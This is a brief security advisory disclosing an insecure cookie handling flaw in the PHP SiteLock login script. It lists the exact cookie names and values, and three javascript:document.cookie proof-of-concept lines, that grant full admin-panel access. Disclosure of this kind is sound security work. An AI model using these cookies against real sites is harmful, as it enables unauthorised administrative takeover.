PHP SiteLock
   Insecure Cookie Handling
  ===========================




 SUMMARY
 ________

 PHP Site Lock: A highly secure website login script which has
 features  like  User  Authentication  &  Management,  Website
 Password  Protection ,   protection of  pdf ,  images ,  etc.



 IMPACT
 _______

 Leads to full administration rights of the admin panel. 



 VERSIONS
 _________

 Vulnerable systems: All versions

 Immune systems: None
 
 
 
 DESCRIPTION #1
 ______________
 
 Insecure cookie handling allows anyone to simply create a custom cookie
 with the values below.  This will allow full access to the admin panel. 

 Name      - user_type
 Content   - admin
 Path      - /
 
 Name      - login_name
 Content   - admin
 Path      - /
 
 Name      - login_id
 Content   - 0
 Path      - /


 Proof of Concept:
   -> javascript:document.cookie="user_type=admin; path=/"
   -> javascript:document.cookie="login_name=admin; path=/"
   -> javascript:document.cookie="login_id=0; path=/"

 Fix: 
   -> None given. 
    
    

 ADDITIONAL INFO
 _______________
 
 
 Vendor URL         - www.phpsitelock.com
 Underlying OS      - Linux (Any), UNIX (Any), Windows (Any)
 Credit             - Jay Scott <jay@jayscott.co.uk
 Message History    - Vendor Contacted.
                      No reply after 30 days